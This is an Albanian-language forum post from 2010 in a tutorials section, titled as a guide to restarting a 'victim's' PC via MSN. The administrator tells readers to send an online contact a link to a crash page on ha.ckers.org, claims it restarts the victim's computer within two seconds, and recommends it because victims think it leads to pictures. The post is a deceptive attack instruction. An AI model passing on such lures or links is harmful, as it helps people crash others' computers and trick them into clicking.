HomePortalliFAQSearchRegisterMemberlistUsergroupsLog in

Share | 
 

 Cysh me ja restartu viktimes PC nepermjet MSN

Go down 
AuthorMessage
MariWana
Administrator
Administrator
avatar

Numri i Mesazheve : 134
Mosha : 26
Lokacioni : Macedonia / Skopje
Data e Regjistrimit : 2007-07-20

PostSubject: Cysh me ja restartu viktimes PC nepermjet MSN   Sat Apr 03 2010, 17:33

Kto trika jan permes msn dmth ate viktim qe eke ne online ja dergon ket link dhe si te klikon aj ne ket per 2 sec do ti restartohet pc.
Nr.1 http://ha.ckers.org/imagecrash.html - kjo perdoret me se shpeshti se viktima mendon qe ka lidhje me ndonje faqe me piktura.
Back to top Go down
View user profile http://www.merwan-92.tr.gg
 
Cysh me ja restartu viktimes PC nepermjet MSN
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
 :: Kompjuter & Teknologji :: Tutoriale-
Jump to: